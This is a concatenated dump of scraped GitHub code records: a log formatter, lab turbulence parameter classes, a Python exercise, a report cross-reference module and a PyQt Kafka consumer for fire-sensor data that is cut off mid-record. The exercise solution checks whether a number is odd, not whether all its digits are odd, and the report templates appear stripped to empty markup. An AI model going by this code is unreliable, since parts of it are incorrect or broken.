== '__main__':\n try:\n main()\n except (OSError, KeyboardInterrupt) as e:\n print(\"... koncim\")\n","repo_name":"queria/play","sub_path":"play2.py","file_name":"play2.py","file_ext":"py","file_size_in_byte":18400,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"71302162402","text":"import logging\n\nclass LogFormatter(logging.Formatter):\n def format(self, record):\n timestamp = self.formatTime(record, \"%Y-%m-%d %H:%M:%S\")\n level = record.levelname\n logger = record.name\n message = record.getMessage().replace('\"', '\\\\\"')\n log_entry = {\n \"timestamp\": timestamp,\n \"level\": level,\n \"logger\": logger,\n \"message\": message\n }\n return f'{{\"timestamp\":\"{timestamp}\", \"level\":\"{level}\", \"logger\":\"{logger}\", \"message\":\"{message}\"}}'\n\ndef log(logger_name):\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG)\n\n handler = logging.StreamHandler()\n formatter = LogFormatter()\n handler.setFormatter(formatter)\n\n logger.addHandler(handler)\n\n return logger\n","repo_name":"jerichosiahaya/RELP","sub_path":"config/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18031550211","text":"from collections import OrderedDict\n\nimport numpy as np\n\nimport config\n\n\nclass Parameters(object):\n \"\"\"For a given run index, determine the type of run\n (single layer / two layer) and load the appropriate\n parameters.\n\n An instance of this class is a function that returns\n a (ordered) dictionary of the run parameters.\n \"\"\"\n # TODO: this path should be in init or config or somewhere else\n root = config.default_root\n single_layer_parameters = config.single_layer_parameters\n two_layer_parameters = config.two_layer_parameters\n\n single_layer_headers = [('run_index', '|S10'),\n ('H', np.float),\n ('D', np.float),\n ('L', np.float),\n ('rho_ambient', np.float),\n ('rho_lock', np.float),\n ('T_ambient', np.float),\n ('T_lock', np.float),\n ('n_sample_ambient', np.float),\n ('n_sample_lock', np.float),\n ('T_sample_ambient', np.float),\n ('T_sample_lock', np.float),\n ]\n\n two_layer_headers = [('run_index', '|S10'),\n ('H', np.float),\n ('D', np.float),\n ('L', np.float),\n ('h_1 / H', np.float),\n ('rho_upper', np.float),\n ('rho_lower', np.float),\n ('rho_lock', np.float),\n ('T_upper', np.float),\n ('T_lower', np.float),\n ('T_lock', np.float),\n ('n_sample_upper', np.float),\n ('n_sample_lower', np.float),\n ('n_sample_lock', np.float),\n ('T_sample_upper', np.float),\n ('T_sample_lower', np.float),\n ('T_sample_lock', np.float),\n ]\n\n def __init__(self, run_index=None):\n self.init_parameters()\n\n def __call__(self, run_index):\n run_type = self.determine_run_type(run_index)\n if run_type == 'single layer':\n return self.get_run_info(self.single_layer, run_index)\n elif run_type == 'two layer':\n return self.get_run_info(self.two_layer, run_index)\n else:\n return None\n\n def get_run_info(self, parameters, index):\n \"\"\"Return the info for a given run index as an\n OrderedDict.\n \"\"\"\n line = np.where(parameters['run_index'] == index)\n info = parameters[line]\n keys = info.dtype.names\n values = info[0]\n odict = OrderedDict(zip(keys, values))\n odict['run type'] = self.determine_run_type(index)\n return odict\n\n def determine_run_type(self, run_index):\n \"\"\"Returns the run type as a string, either\n 'two_layer' or 'single_layer'.\n \"\"\"\n if run_index in self.single_layer['run_index']:\n return 'single layer'\n elif run_index in self.two_layer['run_index']:\n return 'two layer'\n else:\n return None\n\n def init_parameters(self):\n \"\"\"Load the parameters files.\"\"\"\n self.single_layer = self.load_parameters(self.single_layer_parameters,\n self.single_layer_headers)\n self.two_layer = self.load_parameters(self.two_layer_parameters,\n self.two_layer_headers)\n\n @staticmethod\n def load_parameters(file, headers):\n return np.loadtxt(file, dtype=headers, skiprows=2)\n\n\nclass BaseAttributes(object):\n # data vertical step (m)\n dz = 0.00116\n # data horizontal step (m)\n dx = 0.00144\n # data time step (s)\n dt = 0.01\n\n\nclass ProcessedVectors(object):\n # the names of the attributes that an instance should have\n # after running self.execute()\n vectors = [('X', np.float32), # streamwise coordinates\n ('Z', np.float32), # vertical coordinates\n ('T', np.float32), # time coordinates\n ('U', np.float32), # streamwise velocity\n ('V', np.float32), # cross stream velocity\n ('W', np.float32), # vertical velocity\n ]\n vectors = np.dtype(vectors)\n\n\nclass AnalysisVectors(object):\n vectors = [('X', np.float32), # streamwise coordinates\n ('Z', np.float32), # vertical coordinates\n ('T', np.float32), # time coordinates\n\n ('x', np.float32), # streamwise coordinates (single vector)\n ('z', np.float32), # vertical coordinates (single vector)\n ('t', np.float32), # time coordinates (single vector)\n\n ('U', np.float32), # streamwise velocity\n ('V', np.float32), # cross stream velocity\n ('W', np.float32), # vertical velocity\n\n # ('fx', np.float32), # front detection in space\n # ('ft', np.float32), # front detection in time\n ('front_speed', np.float32), # LAB coord front speed\n\n # Waves (LAB coords)\n # (U = U - wU - wUr - Ubg)\n ('wU', np.float32), # streamwise waves (fitted)\n ('wW', np.float32), # vertical waves (fitted)\n\n ('wUr', np.float32), # streamwise waves (remainder)\n ('wWr', np.float32), # vertical waves (remainder)\n\n ('Ubg', np.float32), # background in u\n ('Wbg', np.float32), # background in w\n\n # __FRONT coords\n ('Xf', np.float32), # front relative streamwise coords\n ('Zf', np.float32), # front relative vertical coords\n ('Tf', np.float32), # front relative time coords\n\n ('xf', np.float32), # streamwise coordinates (single vector)\n ('zf', np.float32), # vertical coordinates (single vector)\n ('tf', np.float32), # time coordinates (single vector)\n\n ('Uf', np.float32), # front relative streamwise velocity\n ('Wf', np.float32), # front relative vertical velocity\n\n ('t0', np.float32), # front detection in time (scalar)\n ]\n vectors = np.dtype(vectors)\n\n\nclass ProcessorAttributes(BaseAttributes):\n \"\"\"Class attributes that define vector names / types and\n measurements used in data processing.\n\n Intended to be inherited by all classes that require access to\n these attributes.\n \"\"\"\n # The origin of the coordinate system (centre of the\n # calibration target) is 105mm from the base of the tank\n # and 3250mm from the back of the lock.\n # Coordinates are x positive downstream (away from the lock)\n # and z positive upwards (away from the base).\n horizontal_offset = 3.250\n vertical_offset = 0.105\n\n # In the calibration coordinate system, the valid region\n # is a rectangle with lower left (-0.06, -0.10) and upper\n # right (0.10, 0.02).\n # TODO: do lock relative transform first and change these to\n # lock relative coords\n valid_region_xlim = (-0.070, 0.09)\n valid_region_ylim = (-0.094, 0.02)\n\n save_vectors = ProcessedVectors.vectors\n\n\nclass ProcessedAttributes(BaseAttributes):\n vectors = ProcessedVectors.vectors\n save_vectors = AnalysisVectors.vectors\n\n\nclass AnalysisAttributes(BaseAttributes):\n vectors = AnalysisVectors.vectors\n\n\nclass ExperimentAttributes(object):\n def __init__(self, attributes):\n self.attributes = attributes\n\n @property\n def rlock(self):\n return self.attributes['rho_lock']\n\n @property\n def rambient(self):\n return self.attributes['rho_ambient']\n\n @property\n def L(self):\n return self.attributes['L']\n\n @property\n def H(self):\n return self.attributes['H']\n\n @property\n def D(self):\n return self.attributes['D']\n\n @property\n def g_(self):\n return 9.81 * (self.rlock - self.rambient) / self.rambient\n\n @property\n def U(self):\n return (self.g_ * self.H) ** .5\n","repo_name":"aaren/lab_turbulence","sub_path":"gc_turbulence/attributes.py","file_name":"attributes.py","file_ext":"py","file_size_in_byte":8439,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"37609281446","text":"\"\"\" Write a Python program to find the sublist of numbers from a given list of\nnumbers with only odd digits in increasing order. Go to the editor\nInput:\n[1, 3, 79, 10, 4, 2, 39]\nOutput:\n[1, 3, 39, 79]\nInput:\n[11, 31, 40, 68, 77, 93, 48, 1, 57]\nOutput:\n[1, 11, 31, 57, 77, 93]\nInput:\n[9, -2, 3, 4, -2, 0, 2, -3, 8, -1]\nOutput:\n[-3, -1, 3, 9]\"\"\"\n\n\ndef test(nums):\n result = list(filter(lambda x: x % 2 != 0, nums))\n return sorted(result)\n\n\nnumbers = [1, 3, 79, 10, 4, 2, 39]\nprint(test(numbers))\n\nnumbers = [9, -2, 3, 4, -2, 0, 2, -3, 8, -1]\nprint(test(numbers))","repo_name":"mirshoddev99/Problems-Patterns","sub_path":"Python-100-Exercise/solutions/80-90/82_prob.py","file_name":"82_prob.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10114433678","text":"from markupsafe import Markup\n\nfrom sarna.report_generator import make_run\n\n_xrefs_runs = \"\"\"\n\n \n \n\n\n \n REF {ref} {ops} \n\n\n \n\n\n \n [ref]\n\n\n \n\n\"\"\"\n\n_bookmark = \"\"\"\n\n{run}\n\n\"\"\"\n\n\ndef _ref_name(elem):\n return \"_Ref{:09d}\".format(elem.id)\n\n\ndef xref(elem, xref_type='number'):\n ref_name = _ref_name(elem)\n ref_ops = \"\"\n if xref_type == 'number':\n ref_ops = \"\\\\r \\\\h\"\n elif xref_type == 'title':\n ref_ops = \"\\\\h\"\n\n return Markup(_xrefs_runs.format(ref=ref_name, ops=ref_ops))\n\n\ndef bookmark(elem, attr):\n run = make_run('', getattr(elem, attr))\n return Markup(_bookmark.format(ref=_ref_name(elem), run=run))\n\n\n__all__ = ['xref', 'bookmark']\n","repo_name":"rsrdesarrollo/sarna","sub_path":"sarna/report_generator/xrefs.py","file_name":"xrefs.py","file_ext":"py","file_size_in_byte":1025,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"54"} +{"seq_id":"36419897948","text":"from PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import *\n\nfrom plot_data import plot_data\nfrom analy_data import analy_data, FireDetection_thread\nfrom node_weight import weight_checker\nfrom GL.build_gl import build_gl\n\nimport time\nfrom datetime import datetime\nimport pymysql\nfrom collections import deque\n\nfrom shared_data import SharedData\nfrom kafka import KafkaConsumer\nfrom json import loads\n\nimport paho.mqtt.client as mqtt\nimport json\n\n\nclass kafka_thread(QThread):\n data_updated = pyqtSignal(list)\n\n pem_dir = './pem/'\n caRootLocation = pem_dir + 'CARoot.pem'\n certLocation = pem_dir + 'certificate.pem'\n\n consumer = KafkaConsumer(\n \"maintenance_in\",\n #\n bootstrap_servers=[\"aismarthousing.asuscomm.com:9093\"],\n auto_offset_reset=\"latest\",\n enable_auto_commit=True,\n group_id=\"hbrain5qwe013011311413q11\",\n value_deserializer=lambda x: loads(x.decode('UTF-8')),\n consumer_timeout_ms=10000,\n security_protocol=\"SSL\",\n ssl_check_hostname=True,\n #ssl_cafile=caRootLocation,\n #ssl_certfile=certLocation,\n )\n\n def __init__(self, shared_data):\n super().__init__()\n self.shared_data = shared_data\n self.values = [0] * 210\n self.max_size = 3\n self.total_deques = 210\n self.sensor_data = [[deque(maxlen=self.max_size)] for _ in range(self.total_deques)]\n\n def run(self, consumer=consumer):\n memory_map = [0] * 210\n memory_map[0] = 1\n memory_map[15] = 1\n memory_map[22] = 1\n memory_map[24] = 1\n memory_map[153] = 1\n memory_map[202] = 1\n\n memory_map_check = False\n start_time = time.time()\n\n for message in consumer:\n current_time = time.time()\n elapsed_time = current_time - start_time\n if int(elapsed_time) % 2 == 1:\n sum = 0\n if not memory_map_check:\n for i in range(210):\n sum = sum + memory_map[i]\n if sum == 210:\n memory_map_check = True\n elif memory_map_check:\n for i in range(210):\n if i == 15 or i == 22: # temp\n self.values[i] = 20.0\n elif i == 0 or i == 24 or i == 153 or i == 202: # gas , 0\n self.values[i] = 0.0\n else:\n self.values[i] = (self.sensor_data[i][0][-1][1])\n self.shared_data.set_a(self.values)\n\n start_time = current_time\n parsed_data = message.value\n\n complex_name = parsed_data.get('msg_header', {}).get('complex_name')\n device_name = parsed_data.get('msg_header', {}).get('device_name')\n if complex_name == '에너지체험하우스' and (device_name == \"연기 감지 센서\" or device_name == \"열감지기\"):\n source_key_prefix = parsed_data[\"msg_header\"][\"source_key\"][:4]\n timestamp_value = parsed_data[\"msg_data\"][0][\"field_value\"]\n heat_value = parsed_data[\"msg_data\"][1][\"field_value\"]\n status_value = parsed_data[\"msg_data\"][2][\"field_value\"]\n # region\n if source_key_prefix == \"662c\":\n memory_map[1] = 1\n self.sensor_data[1][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e139\":\n memory_map[2] = 1\n self.sensor_data[2][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"517b\":\n memory_map[3] = 1\n self.sensor_data[3][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"de2e\":\n memory_map[4] = 1\n self.sensor_data[4][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"dfca\":\n memory_map[5] = 1\n self.sensor_data[5][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7ede\":\n memory_map[6] = 1\n self.sensor_data[6][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"951c\":\n memory_map[7] = 1\n self.sensor_data[7][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e293\":\n memory_map[8] = 1\n self.sensor_data[8][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d8a5\":\n memory_map[9] = 1\n self.sensor_data[9][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8b07\":\n memory_map[10] = 1\n self.sensor_data[10][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8cb4\":\n memory_map[11] = 1\n self.sensor_data[11][0].append([timestamp_value, heat_value, status_value])\n # 1층\n elif source_key_prefix == \"a13c\":\n memory_map[12] = 1\n self.sensor_data[12][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"75c6\":\n memory_map[13] = 1\n self.sensor_data[13][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"af5c\":\n memory_map[14] = 1\n self.sensor_data[14][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7830\": # g\n memory_map[16] = 1\n self.sensor_data[16][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"51cc\": # g\n memory_map[17] = 1\n self.sensor_data[17][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0d8e\": # g\n memory_map[18] = 1\n self.sensor_data[18][0].append([timestamp_value, heat_value, status_value])\n # 현재 15(temp)까지 201호 ,\n elif source_key_prefix == \"4e79\":\n memory_map[19] = 1\n self.sensor_data[19][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0b09\":\n memory_map[20] = 1\n self.sensor_data[20][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a223\":\n memory_map[21] = 1\n self.sensor_data[21][0].append([timestamp_value, heat_value, status_value])\n # 23, 24 가 추가 데이터.\n elif source_key_prefix == \"764b\": # g\n memory_map[23] = 1\n self.sensor_data[23][0].append([timestamp_value, heat_value, status_value])\n # 24 는 연기 센서\n elif source_key_prefix == \"5cf2\":\n memory_map[25] = 1\n self.sensor_data[25][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bca1\":\n memory_map[26] = 1\n self.sensor_data[26][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"136c\":\n memory_map[27] = 1\n self.sensor_data[27][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a339\":\n memory_map[28] = 1\n self.sensor_data[28][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a43b\": # g\n memory_map[29] = 1\n self.sensor_data[29][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8068\": # g\n memory_map[30] = 1\n self.sensor_data[30][0].append([timestamp_value, heat_value, status_value])\n # 까지 203호\n elif source_key_prefix == \"8ae3\":\n memory_map[31] = 1\n self.sensor_data[31][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b5c1\":\n memory_map[32] = 1\n self.sensor_data[32][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"26c7\":\n memory_map[33] = 1\n self.sensor_data[33][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"64c7\":\n memory_map[34] = 1\n self.sensor_data[34][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"83a9\":\n memory_map[35] = 1\n self.sensor_data[35][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a16b\":\n memory_map[36] = 1\n self.sensor_data[36][0].append([timestamp_value, heat_value, status_value])\n # 204호\n elif source_key_prefix == \"6a8b\":\n memory_map[37] = 1\n self.sensor_data[37][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"de4b\":\n memory_map[38] = 1\n self.sensor_data[38][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8fb0\":\n memory_map[39] = 1\n self.sensor_data[39][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"679f\":\n memory_map[40] = 1\n self.sensor_data[40][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7b39\": # g\n memory_map[41] = 1\n self.sensor_data[41][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6df7\": # g\n memory_map[42] = 1\n self.sensor_data[42][0].append([timestamp_value, heat_value, status_value])\n # 205호\n elif source_key_prefix == \"6cab\":\n memory_map[43] = 1\n self.sensor_data[43][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"fdec\":\n memory_map[44] = 1\n self.sensor_data[44][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ff97\":\n memory_map[45] = 1\n self.sensor_data[45][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9226\":\n memory_map[46] = 1\n self.sensor_data[46][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3fc6\": # g\n memory_map[47] = 1\n self.sensor_data[47][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bf99\": # g\n memory_map[48] = 1\n self.sensor_data[48][0].append([timestamp_value, heat_value, status_value])\n # 206호\n elif source_key_prefix == \"cd80\":\n memory_map[49] = 1\n self.sensor_data[49][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"310f\":\n memory_map[50] = 1\n self.sensor_data[50][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2c2c\":\n memory_map[51] = 1\n self.sensor_data[51][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f6aa\":\n memory_map[52] = 1\n self.sensor_data[52][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2546\": # g\n memory_map[53] = 1\n self.sensor_data[53][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"b9a4\": # g\n memory_map[54] = 1\n self.sensor_data[54][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"4e35\": # g\n memory_map[55] = 1\n self.sensor_data[55][0].append([timestamp_value, heat_value, status_value])\n # 207호\n elif source_key_prefix == \"c7f6\":\n memory_map[56] = 1\n self.sensor_data[56][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ff69\":\n memory_map[57] = 1\n self.sensor_data[57][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"1cdd\":\n memory_map[58] = 1\n self.sensor_data[58][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"1a3f\":\n memory_map[59] = 1\n self.sensor_data[59][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"cb02\": # 계단\n memory_map[60] = 1\n self.sensor_data[60][0].append([timestamp_value, heat_value, status_value])\n # 2층 공용부\n elif source_key_prefix == \"33f9\":\n memory_map[61] = 1\n self.sensor_data[61][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"75d4\":\n memory_map[62] = 1\n self.sensor_data[62][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"24a3\":\n memory_map[63] = 1\n self.sensor_data[63][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3522\":\n memory_map[64] = 1\n self.sensor_data[64][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6029\":\n memory_map[65] = 1\n self.sensor_data[65][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"27a3\":\n memory_map[66] = 1\n self.sensor_data[66][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6bcf\":\n memory_map[67] = 1\n self.sensor_data[67][0].append([timestamp_value, heat_value, status_value])\n # 301\n elif source_key_prefix == \"d8a9\":\n memory_map[68] = 1\n self.sensor_data[68][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"1d39\":\n memory_map[69] = 1\n self.sensor_data[69][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bd12\":\n memory_map[70] = 1\n self.sensor_data[70][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"550f\":\n memory_map[71] = 1\n self.sensor_data[71][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e842\":\n memory_map[72] = 1\n self.sensor_data[72][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"efc3\":\n memory_map[73] = 1\n self.sensor_data[73][0].append([timestamp_value, heat_value, status_value])\n # 302\n elif source_key_prefix == \"bd90\":\n memory_map[74] = 1\n self.sensor_data[74][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"41a0\":\n memory_map[75] = 1\n self.sensor_data[75][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a2d2\":\n memory_map[76] = 1\n self.sensor_data[76][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"cd6d\":\n memory_map[77] = 1\n self.sensor_data[77][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9351\":\n memory_map[78] = 1\n self.sensor_data[78][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"621c\":\n memory_map[79] = 1\n self.sensor_data[79][0].append([timestamp_value, heat_value, status_value])\n # 303\n elif source_key_prefix == \"c5cc\":\n memory_map[80] = 1\n self.sensor_data[80][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"cf50\":\n memory_map[81] = 1\n self.sensor_data[81][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2d09\":\n memory_map[82] = 1\n self.sensor_data[82][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"fbac\":\n memory_map[83] = 1\n self.sensor_data[83][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d6be\":\n memory_map[84] = 1\n self.sensor_data[84][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7e8a\":\n memory_map[85] = 1\n self.sensor_data[85][0].append([timestamp_value, heat_value, status_value])\n # 304\n elif source_key_prefix == \"b57f\":\n memory_map[86] = 1\n self.sensor_data[86][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"84b8\":\n memory_map[87] = 1\n self.sensor_data[87][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"e6df\":\n memory_map[88] = 1\n self.sensor_data[88][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5ce1\":\n memory_map[89] = 1\n self.sensor_data[89][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5aaf\":\n memory_map[90] = 1\n self.sensor_data[90][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"1abf\":\n memory_map[91] = 1\n self.sensor_data[91][0].append([timestamp_value, heat_value, status_value])\n # 305\n elif source_key_prefix == \"21a7\":\n memory_map[92] = 1\n self.sensor_data[92][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"8132\":\n memory_map[93] = 1\n self.sensor_data[93][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a27e\":\n memory_map[94] = 1\n self.sensor_data[94][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"15e0\":\n memory_map[95] = 1\n self.sensor_data[95][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7578\":\n memory_map[96] = 1\n self.sensor_data[96][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3539\":\n memory_map[97] = 1\n self.sensor_data[97][0].append([timestamp_value, heat_value, status_value])\n # 306\n elif source_key_prefix == \"34c7\":\n memory_map[98] = 1\n self.sensor_data[98][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9c96\":\n memory_map[99] = 1\n self.sensor_data[99][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6438\":\n memory_map[100] = 1\n self.sensor_data[100][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9d94\":\n memory_map[101] = 1\n self.sensor_data[101][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"23ea\": # G\n memory_map[102] = 1\n self.sensor_data[102][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3c8f\": # G\n memory_map[103] = 1\n self.sensor_data[103][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2f14\": # g\n memory_map[104] = 1\n self.sensor_data[104][0].append([timestamp_value, heat_value, status_value])\n # 307\n elif source_key_prefix == \"2f8e\": # 3층 앞복도\n memory_map[105] = 1\n self.sensor_data[105][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"472e\": # 3층 복도\n memory_map[106] = 1\n self.sensor_data[106][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2632\": # 3층 EV홀\n memory_map[107] = 1\n self.sensor_data[107][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f0aa\": # 3층 앞복도\n memory_map[108] = 1\n self.sensor_data[108][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"da17\": # 3층 계단\n memory_map[109] = 1\n self.sensor_data[109][0].append([timestamp_value, heat_value, status_value])\n # 공용부 부분\n elif source_key_prefix == \"496f\":\n memory_map[110] = 1\n self.sensor_data[110][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"dcea\":\n memory_map[111] = 1\n self.sensor_data[111][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d220\":\n memory_map[112] = 1\n self.sensor_data[112][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"9c00\":\n memory_map[113] = 1\n self.sensor_data[113][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"89d4\":\n memory_map[114] = 1\n self.sensor_data[114][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"17c2\":\n memory_map[115] = 1\n self.sensor_data[115][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"133f\":\n memory_map[116] = 1\n self.sensor_data[116][0].append([timestamp_value, heat_value, status_value])\n # 401\n elif source_key_prefix == \"7d73\":\n memory_map[117] = 1\n self.sensor_data[117][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0e0e\":\n memory_map[118] = 1\n self.sensor_data[118][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"2905\":\n memory_map[119] = 1\n self.sensor_data[119][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"1791\":\n memory_map[120] = 1\n self.sensor_data[120][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"f6fd\":\n memory_map[121] = 1\n self.sensor_data[121][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"35e3\":\n memory_map[122] = 1\n self.sensor_data[122][0].append([timestamp_value, heat_value, status_value])\n # 402\n elif source_key_prefix == \"f606\":\n memory_map[123] = 1\n self.sensor_data[123][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bc24\":\n memory_map[124] = 1\n self.sensor_data[124][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"7e6d\":\n memory_map[125] = 1\n self.sensor_data[125][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"3d9f\":\n memory_map[126] = 1\n self.sensor_data[126][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5aa4\": # G\n memory_map[127] = 1\n self.sensor_data[127][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"bf79\": # G\n memory_map[128] = 1\n self.sensor_data[128][0].append([timestamp_value, heat_value, status_value])\n # 403\n elif source_key_prefix == \"e572\":\n memory_map[129] = 1\n self.sensor_data[129][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"0a80\":\n memory_map[130] = 1\n self.sensor_data[130][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"6828\":\n memory_map[131] = 1\n self.sensor_data[131][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"a213\":\n memory_map[132] = 1\n self.sensor_data[132][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"ca65\":\n memory_map[133] = 1\n self.sensor_data[133][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"d7fb\":\n memory_map[134] = 1\n self.sensor_data[134][0].append([timestamp_value, heat_value, status_value])\n # 404\n elif source_key_prefix == \"3471\":\n memory_map[135] = 1\n self.sensor_data[135][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"c1c7\":\n memory_map[136] = 1\n self.sensor_data[136][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"5869\":\n memory_map[137] = 1\n self.sensor_data[137][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"77ac\":\n memory_map[138] = 1\n self.sensor_data[138][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"495a\":\n memory_map[139] = 1\n self.sensor_data[139][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == \"c3dd\":\n memory_map[140] = 1\n self.sensor_data[140][0].append([timestamp_value, heat_value, status_value])\n # 405\n elif source_key_prefix == \"5841\":\n memory_map[141] = 1\n self.sensor_data[141][0].append([timestamp_value, heat_value, status_value])\n elif source_key_prefix == 